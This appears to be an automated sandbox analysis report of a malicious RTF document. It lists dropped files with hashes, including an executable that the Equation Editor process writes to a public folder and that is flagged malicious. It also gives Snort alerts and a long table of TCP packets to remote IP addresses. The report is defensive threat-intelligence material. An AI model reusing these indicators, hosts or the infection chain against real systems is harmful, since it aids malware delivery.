                                                            SSDEEP:12:8w5eFgXg/XAlCPCHaX6zBFB/IGUX+WNwfLkx0sOicvbSRkCl4S0seDtZ3YilMMEO:8w5y/XTKz3WhrHte2NHeDv3qlQd7Qy
                                                            MD5:0CAB2B6943F0D12CA4B6285B22202999
                                                            SHA1:AD018F3F3F6BAC905FC8999CCBAD2190A60FDCA0
                                                            SHA-256:A993ED6EB3B351B317C05744C641294B9A2CD735E57E8BBF4666C74C222C74FC
                                                            SHA-512:8424761740A2D9AEBC20190AC3FF290B782FC1B2C92E45FD6BE91376F47A0C4542EFB59437B8C7C587BE2892721E7EE749C3B63D307BA09CE6D0227C7E9CCB39
                                                            Malicious:false
                                                            Reputation:low
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):72
                                                            Entropy (8bit):4.891962939381966
                                                            Encrypted:false
                                                            SSDEEP:3:bDuMJlHCoP/SmxWJToP/Sv:bCICoXeToXc
                                                            MD5:98198491AD9C6556CF158DF33B3EC4E5
                                                            SHA1:5FDDCDD11FD061308338442F8CDDFB10E536A397
                                                            SHA-256:E97FB0507D819A0D2EE95DFB51A9544E4907033C8F2FA486B6F4B584572EA5B8
                                                            SHA-512:6876CE8FE8FA0A5B1C7956B664F95FD1D0EA0CF69C719A82BF3EAE7830CC70C66D0AB9F266568C804D8FF1C85E60E43977A2481B12728CD0FBC074A3FF66D5BE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: [folders]..Templates.LNK=0..3nkW4MtwSD.LNK=0..[misc]..3nkW4MtwSD.LNK=0..
                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.503835550707526
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                            MD5:6462452E1083FFF3724A32DC01771E8B
                                                            SHA1:244116899824E727C5C399064F004C71D88F7254
                                                            SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                            SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                            Malicious:false
                                                            C:\Users\user\Desktop\~$kW4MtwSD.rtf
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.503835550707526
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                            MD5:6462452E1083FFF3724A32DC01771E8B
                                                            SHA1:244116899824E727C5C399064F004C71D88F7254
                                                            SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                            SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                            Malicious:false
                                                            C:\Users\Public\vbc.exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):739840
                                                            Entropy (8bit):7.768720486449457
                                                            Encrypted:false
                                                            SSDEEP:12288:QBzcmhiTyq+0tWTpvmEwyd2NR5SR72R6/NHJbBMa59mO/1flaMMdrixBFmRq:QBomhi+2WYEFdqu5NHJbBMa5Mdri1Wq
                                                            MD5:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            SHA1:984A18333BCD137D00A2223A10B83946F0B3949D
                                                            SHA-256:42173F59707DE5929C3BC6CD37D5E0DC55D990BCE2C29AA6DEAC6E86C3EEC250
                                                            SHA-512:D00A949F26740996D4DA000ABC5B5241D812D3C7D1A1D0A92863A11F825B79333F20B4105BB2EAAD67472F1229E35BD6E056A27BE5C4418D639D18AEED3FC676
                                                            Malicious:true

                                                            Static File Info

                                                            General

                                                            File type:Rich Text Format data, unknown version
                                                            Entropy (8bit):4.083855353458583
                                                            TrID:
                                                            • Rich Text Format (5005/1) 55.56%
                                                            • Rich Text Format (4004/1) 44.44%
                                                            File name:3nkW4MtwSD.rtf
                                                            File size:22268
                                                            MD5:5aad2b6635b3069402aaf6ff389bea64
                                                            SHA1:a8617ddffd6c934fcf3f64c6e84b1a23ffa9d092
                                                            SHA256:718dcc870c0de487595feed4e5e43dc70fba6fa2aaac15462c0ba5c20028e7bd
                                                            SHA512:2bcdcc3775f8d2a163b8b564232a5839fe625b8ab7f8b6de613b57abf436e6acb095d5bc2a081e966aa4422a9edb9a81df031d4da40add21cef4404aa45a5d3d
                                                            SSDEEP:384:hPD5SVOnYJqhGw3DUDFoI/QzRckPc/4XHry8MVxAy7aD+e:hPD5SInYEhGwGFoIcluHVxB7a
                                                            File Content Preview:{\rtf6611&-+4!?7$>|.|:+%]_.!4#&.2`(2.?1-..+|$>=8+.030+4*?%/+~,<667<???%)/|>!|!.%|^?`.3'?|8-)?'%%$6^;,?%7.$?983(2(+?.?|=.8?8|*7,!5_^]5|7,[??3.!.0')?8.?6&53.;`'?/2%??41?%_+*`)%^-*&>,96(.[~3?2.=,`78)!%?81^)736.@[_?.67%?+-&:@??=>0>;3)?.+0]=?~?_?]?$82;@%7=~<3!

                                                            File Icon

                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                            Static RTF Info

                                                            Objects

                                                            Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                            0 | 00000B6Ch | | | | | | | | no
                                                            1 | 00000B35h | | | | | | | | no

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                            11/25/21-17:25:23.079817 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49166 | 34.102.136.180 | 192.168.2.22
                                                            11/25/21-17:25:43.645796 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 34.102.136.180 | 192.168.2.22

                                                            Network Port Distribution

                                                            TCP Packets

                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Nov 25, 2021 17:23:58.402806044 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402831078 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402858973 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402868032 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402894020 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402911901 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402914047 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402951002 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402987003 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402991056 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.403019905 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.403032064 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.403059959 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.403069019 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.403081894 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.403110027 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.403130054 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.403167009 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404295921 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404339075 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404376984 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404380083 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404417038 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404417992 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404436111 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404459000 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404474020 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404499054 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404520035 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404540062 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404553890 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404580116 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404599905 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404619932 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404634953 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404659986 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404683113 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404696941 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404715061 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404736996 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404743910 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404774904 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404797077 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404813051 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404834986 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404860973 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404881954 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404936075 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404949903 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404975891 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404997110 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405014038 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405028105 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405054092 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405076981 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405092955 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405117989 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405132055 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405158997 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405170918 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405190945 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405209064 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405224085 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405246973 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405272007 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405303001 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.406614065 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.520653963 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520713091 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520742893 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520772934 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520811081 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520874977 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520925045 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520965099 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.521033049 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.521090031 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.521100044 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.521106005 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523550034 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523595095 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523633003 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523673058 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523710966 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523721933 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523751020 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523751974 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523758888 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523765087 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523793936 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523809910 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523838043 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523860931 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523884058 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523907900 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523926020 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523931980 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523967028 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523987055 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524008036 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524024010 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524048090 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524071932 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524087906 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524110079 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524130106 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524152040 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524166107 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524185896 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524205923 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524219990 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524245977 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524275064 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524282932 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524310112 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524322033 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524336100 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524362087 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524382114 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524408102 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524415970 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524449110 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524471045 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524486065 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524512053 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524525881 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524528980 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524564981 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524591923 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524601936 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524631023 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524641037 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524653912 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524682999 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524703979 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524723053 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524740934 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524764061 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524777889 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524801970 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524827957 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524841070 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524863005 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524904013 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524915934 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524955988 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524980068 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524991989 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.525011063 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.525041103 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.525043011 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.525079966 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.525104046 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.525120974 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.525136948 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.525161028 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.525181055 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.525213003 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.525824070 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638046026 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638124943 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638165951 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638204098 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638207912 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638243914 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638250113 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638257027 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638283968 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638319016 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638323069 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638336897 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638365030 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638376951 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638406992 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638422966 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638446093 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638463020 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638485909 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638499975 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638525963 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638540983 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638565063 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638580084 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638605118 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638618946 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638644934 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638659000 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638684988 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.638700962 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.638740063 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.642509937 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.642586946 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.642637014 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.642642021 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.642678976 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.642683983 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.642697096 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.642721891 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.642748117 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.642770052 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.642775059 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.642817020 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.642839909 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.642875910 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.642891884 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.642920017 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.642949104 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.642982006 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.643007040 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.643039942 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.643063068 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.643096924 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.643102884 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.643157005 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.643173933 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.643214941 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.643222094 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764483929 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764518023 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.764527082 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764559031 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.764566898 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764599085 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.764624119 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764638901 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.764650106 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764679909 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.764683962 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764724016 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.764728069 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764761925 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.764780998 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764802933 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.764806986 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764873028 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764889956 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.764934063 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.764950991 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.764966965 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.764985085 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765002966 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765019894 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765038967 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765055895 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765073061 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765095949 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765108109 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765125036 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765145063 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765172958 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765180111 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765193939 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765214920 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765249968 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765270948 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765297890 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765307903 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765320063 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765336037 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765362024 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765368938 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765398026 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765403986 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765420914 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765439034 CET8049165198.46.199.153192.168.2.22
